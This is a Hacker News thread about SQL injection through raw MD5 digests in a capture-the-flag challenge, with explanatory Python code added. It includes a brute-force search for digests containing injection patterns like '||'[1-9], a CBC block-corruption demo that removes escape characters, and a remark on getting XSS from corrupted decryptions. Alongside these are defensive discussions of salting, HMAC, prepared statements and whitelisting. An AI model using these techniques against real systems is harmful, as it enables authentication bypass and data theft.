SQL injection with raw MD5 hashes

tptacek · on Nov 28, 2010

Summary: binary MD5 hashes are, in fact, binary, and any given MD5 hash has roughly a 1/16 chance of containing a given SQL metacharacter. The CTF challenge here required the calculation of a hash containing a whole 4-character injection string; this is harder, but not Hard.
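A quick check of the 1/16 figure. This assumes each of the 16 raw digest bytes is uniformly random and independent, which is a modeling assumption rather than something MD5 guarantees. Under that assumption, the chance that a digest contains a given byte such as ' (0x27) at least once is 1 - (255/256)^16, about 0.061, or roughly 1 in 16.5.

```python
DIGEST_LEN = 16  # a raw MD5 digest is 16 bytes


def p_contains_byte(n_bytes: int = DIGEST_LEN) -> float:
    """Chance that n uniform random bytes include one specific byte value at least once."""
    # Each byte misses the target value with probability 255/256.
    return 1 - (255 / 256) ** n_bytes


p = p_contains_byte()
print(f"P(digest contains a quote) = {p:.4f}, about 1 in {1 / p:.1f}")
```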

You should know that the exact same problem applies (more so, in fact) to encrypted strings. Developer laziness insulates most apps from raw MD5 digests (most devs use the hex digest function, which returns human-readable [and safe] output). But the exact same "iterate 1 bit at a time until you hit a jackpot block" trick works with almost every application that uses AES.
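To make the hex-versus-raw distinction concrete, here is a small Python sketch. hashlib's hexdigest() corresponds to PHP's default md5($x), and digest() corresponds to md5($x, true). The input "1" is chosen to match the md5(1) example quoted later in the thread.

```python
import hashlib
import string

password = b"1"

hex_digest = hashlib.md5(password).hexdigest()  # 32 characters drawn from 0-9a-f
raw_digest = hashlib.md5(password).digest()     # the same 16 bytes, any value 0x00-0xff

# The hex form can never contain ', \, ;, or any other SQL metacharacter.
HEX_ALPHABET = set(string.digits + "abcdef")
assert set(hex_digest) <= HEX_ALPHABET

# Both encode the same hash; only the raw form is unsafe to paste into SQL text.
assert bytes.fromhex(hex_digest) == raw_digest
print(hex_digest)
```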

It's not just SQL, either; I've used it to get XSS out of corrupted AES decryptions as well.

And, of course, the same trick works in the opposite direction. If you encrypt a string with a quoting domain (say, where the character ';' needs to be quoted '\;' to preserve an encoded tuple), attackers can pad inputs to get the quote and the metacharacter to span blocks, then use block corruption to kill the quote but not the metacharacter.
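Here is a minimal sketch of the block-corruption trick in CBC mode. Python's standard library has no AES, so a toy 4-round Feistel cipher stands in for "some block cipher". It is NOT AES and NOT secure. The demo relies only on the CBC relation P[i] = D(C[i]) XOR C[i-1]. The encoding (';' as separator, '\;' as a literal) and all function names are hypothetical. The local decrypt call plays the role of whatever the attacker can observe from the server.

```python
import hashlib
import hmac

BLOCK = 16
HALF = BLOCK // 2


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    # Round function for a toy Feistel cipher: NOT AES, NOT secure.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:HALF]


def encrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:HALF], block[HALF:]
    for rnd in range(4):
        left, right = right, xor(left, _round(key, rnd, right))
    return left + right


def decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:HALF], block[HALF:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _round(key, rnd, left)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    assert len(pt) % BLOCK == 0, "sketch assumes already-padded plaintext"
    prev, out = iv, b""
    for i in range(0, len(pt), BLOCK):
        prev = encrypt_block(key, xor(pt[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    prev, out = iv, b""
    for i in range(0, len(ct), BLOCK):
        block = ct[i:i + BLOCK]
        out += xor(decrypt_block(key, block), prev)  # P[i] = D(C[i]) XOR C[i-1]
        prev = block
    return out


def kill_escape(decrypt, ct: bytes):
    """Corrupt the last byte of C[0] until P[0] no longer ends in a backslash.

    P[0] decrypts to garbage, while P[1] only has its last byte flipped,
    so the ';' at the start of P[1] survives.
    """
    for delta in range(1, 256):
        tampered = bytearray(ct)
        tampered[BLOCK - 1] ^= delta
        pt = decrypt(bytes(tampered))
        if pt[BLOCK - 1] != ord("\\"):  # jackpot: the escape character is gone
            return pt
    return None


key, iv = b"k" * BLOCK, bytes(BLOCK)
# Attacker-controlled padding puts the escape '\' at the end of block 0
# and the ';' it protects at the start of block 1.
pt = b"name=AAAAAAAAAA\\" + b";admin=1........"
ct = cbc_encrypt(key, iv, pt)
forged = kill_escape(lambda c: cbc_decrypt(key, iv, c), ct)
print(forged[BLOCK:])
```

The garbled first block is the price of the attack. Whether the application tolerates it depends entirely on how it parses the decrypted string.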

Have I mentioned today how you shouldn't be building crypto code? DON'T DATE ROBOTS.

akirk · on Nov 29, 2010

It feels like it's constantly being hammered into programmers' minds never to use unescaped strings in DB queries. It's hard to believe that a decent programmer would concatenate such raw output into an SQL string unescaped. Nevertheless, I'm sure this happens all the time.

The interesting thing about this report is how fast you can brute-force calculate this in order to find a magic byte sequence.
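Here is a rough sketch of the brute-force search itself. It hashes candidate inputs until the raw digest matches a byte pattern. Using a simple counter ("0", "1", "2", ...) as the input generator is an assumption; the linked write-ups describe what the actual solvers did. The cheap demo pattern is a single quote, which per tptacek's estimate shows up in roughly 1 in 16 digests. The 4-character '||'[1-9] target from the thread needs vastly more attempts, and pure Python is slow for that.

```python
import hashlib
import re


def find_injecting_input(pattern: re.Pattern, max_tries: int = 10_000_000):
    """Hash "0", "1", "2", ... until a raw MD5 digest matches `pattern`.

    Returns (input, raw_digest), or None if nothing matched within max_tries.
    """
    for n in range(max_tries):
        candidate = str(n).encode()
        digest = hashlib.md5(candidate).digest()  # raw 16 bytes, like md5($x, true)
        if pattern.search(digest):
            return candidate, digest
    return None


# Cheap demo target: any digest containing a single quote.
hit = find_injecting_input(re.compile(rb"'"))
print(hit)

# The 4-character target discussed in the thread (far slower to find).
TARGET = re.compile(rb"'\|\|'[1-9]")
```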

DougBTX · on Nov 28, 2010

The winner managed it with a 3-char injection: http://blog.nibbles.fr/2039

daeken · on Nov 28, 2010

> It's not just SQL, either; I've used it to get XSS out of corrupted AES decryptions as well.

How would you go about such a thing? My initial thought is to simply permute over the controllable bytes and see what comes out, looking for specific characters that get you what you need, e.g. a quote to break out of an HTML attribute, but I think I might be missing an easier path.

tptacek · on Nov 28, 2010

Nope, that's how you do it. In the case I'm thinking of, I only needed one character (but it needed to be the last byte).

pontifier · on Nov 29, 2010

I wish there were an easy answer to encryption and security, but it seems like an arms race à la "The Cassini Division". No matter how you build a system, there are always more inputs to compromise... and the attackers never give up.

axod · on Nov 29, 2010

The easy way is to not use a stupid function like md5(?, true), which returns binary data, and not include its output unescaped in your SQL.

It's really not rocket science.

mike-cardwell · on Nov 29, 2010

Exactly. It's so damn easy to not make these mistakes. I don't know how people manage it.

pontifier · on Nov 30, 2010

Is it easy to enumerate all the potential attack points in a system?

aonic · on Nov 28, 2010

In all my years of dealing with ugly and insecure PHP code, I have never seen anyone use raw MD5s in PHP.

It sounds like a situation fabricated just for the game, rather than something resembling real life. I'm not saying it's not possible, but the type of coder who would make an SQL injection oversight like this would also not bother to pass a non-default raw_output value to the function just for the heck of it.

bl4k · on Nov 28, 2010

I am more impressed by whoever came up with the challenge, although setting the second parameter of md5 to 'true' made the solution to the puzzle obvious (nobody would ever use binary output in real life).

The French team found the solution faster because they worked out that any '=' would work; their keyspace search was thus an order of magnitude quicker:

http://blog.nibbles.fr/2039

sgronblo · on Nov 29, 2010

I thought it required '='[^1-9]? Because the real password = 'bogus crap' comparison would evaluate to 0, which would then be compared to a string starting with something other than 1-9, and that string also converts to 0.
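sgronblo's reasoning can be checked with a small model of MySQL's behavior. The query WHERE password = 'left'='right' parses as (password = 'left') = 'right', and comparing a number with a string converts the string using its leading numeric prefix. This is a simplified, hypothetical model: mysql_like_to_number and where_clause are illustration-only names. Real MySQL also involves collations, warnings, and other edge cases not modeled here.

```python
import re

# Leading numeric prefix, roughly as MySQL reads a string used in numeric context.
_NUM_PREFIX = re.compile(r"\s*[+-]?(?:\d+(?:\.\d*)?|\.\d+)")


def mysql_like_to_number(s: str) -> float:
    """'12abc' -> 12.0, 'abc' -> 0.0 (simplified model of string-to-number coercion)."""
    m = _NUM_PREFIX.match(s)
    return float(m.group()) if m else 0.0


def where_clause(stored_password: str, left: str, right: str) -> bool:
    """Model of: WHERE password = 'left'='right', i.e. (password = 'left') = 'right'."""
    first = 1 if stored_password == left else 0  # the bogus left side does not match: 0
    return first == mysql_like_to_number(right)  # 0 == number('right')
```

With a non-matching left side, the clause is true exactly when the right side coerces to 0, which is why a digit 1-9 right after '=' spoils it.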

photon_off · on Nov 29, 2010

This might be only tangentially related, and I'm sure nearly everyone on HN knows this, but salting MD5s is probably the easiest way to significantly increase their security. By changing md5($var) to md5($var . "foo"), this type of attack could be prevented, assuming that the crackers don't have access to the source code [in this challenge, they did].

To get an idea of what can be exposed if you don't salt, and thus use predictable hashes, have a look here: http://www.google.com/#q=inurl:c4ca4238a0b923820dcc509a6f758...

md5(1) = c4ca4238...

timtadh · on Nov 29, 2010

+1 to prodigal_erik

Also, concatenating "foo" to the end of /every/ password is not salting your hash. You need a suitably random string for it to be considered a salt, and you want a different random string for every password in your database.
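Here is a minimal sketch of "a different random string for every password". The salt is generated per password and stored alongside the hash. Note that this sketch swaps in hashlib.pbkdf2_hmac (a slow, salted key-derivation function) rather than plain MD5. The salt handling is the point here, and the iteration count is illustrative, not a recommendation.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # illustrative work factor only


def hash_password(password: str) -> tuple[bytes, bytes]:
    salt = os.urandom(16)  # fresh random salt for every password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest  # store both; the salt does not need to be secret


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison
```

Because each user gets a different salt, two users with the same password end up with different stored hashes. A precomputed table of md5("1")-style values is then useless.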

[+1 to tptacek for constantly saying don't write crypto code :-p]

photon_off · on Nov 29, 2010

I should have noted that "foo" wasn't meant to be taken literally; clearly it should be something that wouldn't show up in a dictionary. Even so, the point was that any salt is substantially better than none, and is easy to implement.

prodigal_erik · on Nov 29, 2010

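There are theoretical attacks against simply adding secret bits to a single hash. You're probably better off with HMAC, which is essentially md5($key . md5($key . $message)) with a few padding details: the key is padded to the hash's block size and XORed with a different constant for the inner and outer hash.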
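To show the nested structure prodigal_erik describes, here is HMAC-MD5 written out by hand following RFC 2104 (0x36 and 0x5C are the standard ipad/opad bytes). The result is checked against Python's hmac module. This sketch is for illustration only; in practice you would just call hmac.new. The key and message values are arbitrary examples.

```python
import hashlib
import hmac

BLOCK_SIZE = 64  # MD5 processes 64-byte blocks


def hmac_md5(key: bytes, message: bytes) -> bytes:
    """HMAC-MD5 per RFC 2104, spelled out to show the two nested hashes."""
    if len(key) > BLOCK_SIZE:
        key = hashlib.md5(key).digest()       # long keys are hashed first
    key = key.ljust(BLOCK_SIZE, b"\x00")      # then zero-padded to the block size
    inner_key = bytes(b ^ 0x36 for b in key)  # ipad
    outer_key = bytes(b ^ 0x5C for b in key)  # opad
    inner = hashlib.md5(inner_key + message).digest()
    return hashlib.md5(outer_key + inner).digest()


tag = hmac_md5(b"server-secret", b"user=alice")
# The standard library's implementation should agree byte for byte.
assert tag == hmac.new(b"server-secret", b"user=alice", hashlib.md5).digest()
```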

http://en.wikipedia.org/wiki/HMAC

JoachimSchipper · on Nov 29, 2010

"Salting" is not the solution to every problem. More to the point, if you put binary data in an SQL query things are going to break, even if you use tricks like this to make it a bit less predictable. (Really, the probability of random binary data containing a ' character is pretty high...)

philfreo · on Nov 28, 2010

And here's what looks like an even faster solution, though it's in French: http://blog.nibbles.fr/2039

gus_massa · on Nov 29, 2010

Automatic Google Translation: http://translate.google.com/translate?js=n&prev=_t&h...

sh1mmer · on Nov 29, 2010

PHP contains filters for a reason. They are there to protect you.

While this was a clever challenge, in general you should sanitize all of your input using filters.

pornel · on Nov 29, 2010

Filtering input is not an appropriate way of ensuring that SQL queries are safe: you'd be telling people named "O'Hara" that they're not SQL-compatible, or you'd fall into the magic_quotes trap.

You should escape output.

In this case there isn't anything wrong with the input, and you can't say that any byte of MD5 is wrong or dangerous.

It's just data that is used improperly.

Binary data in SQL queries is especially tricky, because strings may be expected to be in a specific character encoding (e.g. UTF-8), so you either need to use prepared statements and pass the argument explicitly as binary, or use string-safe escaping (e.g. hex).
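Here is a sketch of the prepared-statement route using Python's built-in sqlite3 module. The raw digest is passed as a bytes parameter, which sqlite3 binds as a BLOB, so quote bytes inside it are never parsed as SQL. The table layout and function names are hypothetical. MD5 appears only to mirror the thread; it is not a recommendation for password storage.

```python
import hashlib
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, pass_md5 BLOB)")


def add_user(name: str, password: str) -> None:
    digest = hashlib.md5(password.encode()).digest()  # raw 16 bytes, may contain '
    # Placeholders send name and digest as data; the digest is bound as a BLOB.
    conn.execute("INSERT INTO users VALUES (?, ?)", (name, digest))


def check_login(name: str, password: str) -> bool:
    digest = hashlib.md5(password.encode()).digest()
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE name = ? AND pass_md5 = ?", (name, digest)
    ).fetchone()
    return row[0] == 1


add_user("O'Hara", "hunter2")  # the apostrophe needs no filtering or escaping
```

The hex alternative pornel mentions amounts to storing hashlib.md5(...).hexdigest() instead. That value can only ever contain 0-9 and a-f.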

getsat · on Nov 29, 2010

In general, you should not use PHP, but if you must, you should be using a framework that handles this kind of stuff for you.

Input sanitisation has been solved thousands of times by people smarter than you. Do not reinvent the wheel (poorly).

konad · on Nov 30, 2010

magic_quotes is turned off by default for a reason too.

hackermom · on Nov 28, 2010

This is all quite clever, but any wary developer makes sure to use either properly sanitized inputs or, better still, prepared SQL statements (e.g. as available through PHP's PDO extension), so this trickery, no matter how clever, is really not a big issue.

tptacek · on Nov 28, 2010

"Any wary developer" ranks up there with "a sufficiently clever compiler" among the True Scotsmen of our industry. I don't think you're right; empirically, unsafe SQL is a very big issue, and the places where a QA team is unlikely to stumble across injection vectors (i.e., any vector where the string "O'Malley" doesn't pop up an error to paste into a ticket) are worse still, since teams don't find them.

frederique · on Nov 28, 2010

I think you don't look outside your own "boxeola" much. Not all development is done by a) a clueless team that passes the software on to b) quality assurance + bughunters. Relying on or assuming that someone else will take care of any loose ends is a very bad and ignorant approach to creating software, and in my nearly 15 years of experience as a European programmer, this is thankfully nowhere near the majority of cases.

daeken · on Nov 28, 2010

I think one key difference is in when the software was developed. If I had to guess, most software developed in the past 5 years (being conservative here) is most likely not vulnerable to SQL injection, simply because doing things the right way (that is, using parameterized queries and the like) is so easy these days. But if you look at software developed prior -- and software built at a lower level, e.g. directly hitting the PHP mysql API -- you've got a fair shot at stumbling upon SQL injection, I'd say. That means that most developers writing say, Django or Rails apps, are never going to have to think about SQL injection, and won't see how prevalent it is. In theory, SQL injection is a solved problem -- we've known how to avoid it for a long, long time -- but in practice, it's still out there in full force, largely due to legacy code.

tptacek · on Nov 28, 2010

Parameterized queries are also simply not the panacea they're made out to be; there remain plenty of opportunities for injection even with a parameterized query. SQL injection via MD5 digests is indeed unlikely, but not because of query structure --- rather, because most developers don't know to take the binary result instead of the more convenient hex result.

It just rubs me the wrong way when people claim "if you do things right, you'll never run into this problem anyways". Two possible interpretations: either "do things right" is too broad to mean anything (no-true-Scotsman-style) or "do things right" involves a piece of advice like "use parameterized queries" which doesn't actually work reliably in the real world.

We have absolutely found SQL injection in Rails code before. I've also had engagements on very modern financial codebases where the developers were able to expound at length on how impossible it would be for them to have injection --- providing entirely sane design rules to back it up --- that ended up losing their entire app to pre-auth SQLI. There's always some tiny corner of the app --- a custom query builder, a hand-hacked pagination system, a sort column generator, a table selector parameter, that one stored procedure that does dynamic SQL and doesn't know what U+2032 is --- that manages to slip up.

jtdowney · on Nov 29, 2010

> Parameterized queries are also simply not the panacea they're made out to be; there remain plenty of opportunities for injection even with a parameterized query.

Can you describe a case or point to example code using a parameterized query that is vulnerable to SQL injection? I've seen a stored procedure that built raw queries and passed them to sp_executesql (T-SQL), which provided a vector for SQL injection. However, I am struggling to think of a case where a parameterized query could allow for SQL injection.

tptacek · on Nov 29, 2010

Not every input to a query can be bound as a parameter.

Simplest example: User.find_by_sql(["SELECT * FROM users WHERE name = ? LIMIT #{limit}", name])

Other examples: sort order (ASC/DESC), table selection, join columns, GROUP BY argument.

If you think I'm arguing against parameterized queries: of course not. Use them. But know their limitations.
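One common way to handle the inputs that can't be placeholders is to map them onto a fixed whitelist and coerce numbers explicitly, instead of interpolating user text. Here is a sketch in Python with sqlite3; the column names, limits, and build_user_query are hypothetical. Some databases and drivers do accept a placeholder for LIMIT, but column names and ASC/DESC cannot be bound as parameters.

```python
import sqlite3

# Untrusted values are only ever used as keys; the SQL text comes from these tables.
SORT_COLUMNS = {"name": "name", "created": "created_at"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_user_query(sort: str, direction: str, limit: str) -> str:
    column = SORT_COLUMNS.get(sort, "name")                 # unknown -> safe default
    order = SORT_DIRECTIONS.get(direction.lower(), "ASC")
    n = max(1, min(int(limit), 100))  # int() raises ValueError on "10; DROP TABLE users"
    # The name filter still goes through a normal placeholder.
    return f"SELECT name FROM users WHERE name LIKE ? ORDER BY {column} {order} LIMIT {n}"


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, created_at INTEGER)")
conn.executemany("INSERT INTO users VALUES (?, ?)", [("alice", 2), ("bob", 1)])
rows = conn.execute(build_user_query("created", "desc", "10"), ("%",)).fetchall()
```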

jerf · on Nov 29, 2010

For those who didn't know what tptacek meant by U+2032, like me, a quick Google search picked up this: http://news.ycombinator.net/item?id=1940713 , in which he explained it three days ago: "This is a classic web security problem; most famously, WinAPI systems have a 'flattening' function that would convert things like PRIME U+2032 into ASCII 0x27 (the tick that terminates SQL statements)."
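Here is a sketch of why such flattening is dangerous: if escaping runs before the lossy conversion, the conversion can manufacture an unescaped quote. Python has no WinAPI "best fit" conversion, so BEST_FIT below is a hypothetical stand-in that contains only the PRIME-to-apostrophe mapping quoted above. sql_escape is a deliberately naive quote-doubling function, used for illustration only.

```python
# Hypothetical stand-in for a "best fit" conversion that folds some
# non-ASCII characters onto ASCII look-alikes.
BEST_FIT = {"\u2032": "'"}  # PRIME -> APOSTROPHE


def flatten(s: str) -> str:
    return "".join(BEST_FIT.get(ch, ch) for ch in s)


def sql_escape(s: str) -> str:
    return s.replace("'", "''")  # naive quote doubling, illustration only


payload = "x\u2032 OR 1=1 --"
wrong = flatten(sql_escape(payload))  # escape first: PRIME slips through, then becomes '
right = sql_escape(flatten(payload))  # flatten first: the resulting ' gets escaped
```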

Someone · on Nov 29, 2010

I am not so sure of that. There is lots of code that is not so much developed as it is evolved from a Q&D n-liner (n<20). Such code can easily have some left-over opportunities for SQL injection attacks.

tptacek · on Nov 28, 2010

We're basically paid to look in other people's boxeolae.

Sorry, if your own personal experience suggests that most software is rigorous with SQL and input validation, I think I have to assert a broader and more accurate perspective on the issue. It feels statistically improbable to me that we're just missing all the "good" software.

daeken · on Nov 28, 2010

Sorry, I actually intended to reply to the parent of your comment -- reposted and deleted my response just after you commented.

Parameterized queries aren't a panacea, but they seem to mitigate most of the issues. That said, a lot of people rely solely on them, thinking they really are. While certain things make the vast majority of attacks infeasible (e.g. using SQLAlchemy rather than any straight SQL), nothing can replace actually knowing about the security issues and designing solutions that are immune to them.

frederique · on Nov 29, 2010

This could be a case of demographic difference. Programming culture and methods of approach are vastly different in Europe, the Americas, and Asia, as migrating workers in our field often tell us. Consequently, we can assert that it is equally likely that it is just you who has a narrow and self-serving perspective of your business, and that there is more diversity out there than what you specifically deal with for your living :-)

konad · on Nov 30, 2010

I know there was already a shorter solution, but

instead of '||'[1-9]

one could have searched for

'!=' or '<>', thus opening up the search space.
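Here is a sketch of a combined byte pattern for the candidates named in the thread. It applies sgronblo's string-to-number reasoning: with a non-matching left side, the first comparison yields 0. '=' then needs a right side that coerces to 0 ([^1-9]). '||', '!=' and '<>' need one that coerces to non-zero, which this sketch approximates with [1-9]. Requiring [1-9] after '!=' and '<>' is my assumption, not something konad stated. A real candidate must also leave the rest of the query parseable (for example, a stray backslash before the pattern would escape the quote), and this filter does not check that.

```python
import re

ALWAYS_TRUE = re.compile(
    rb"'\|\|'[1-9]"          # ... = 'x'||'7...  -> (0) OR 7  -> true
    rb"|'='[^1-9]"           # ... = 'x'='a...   -> (0) = 0   -> true
    rb"|'(?:!=|<>)'[1-9]"    # ... = 'x'!='7...  -> (0) != 7  -> true
)


def digest_is_candidate(raw_digest: bytes) -> bool:
    """True if the raw digest contains any of the always-true patterns above."""
    return ALWAYS_TRUE.search(raw_digest) is not None
```

Accepting several alternatives multiplies the number of matching byte strings, which is the search-space gain konad describes.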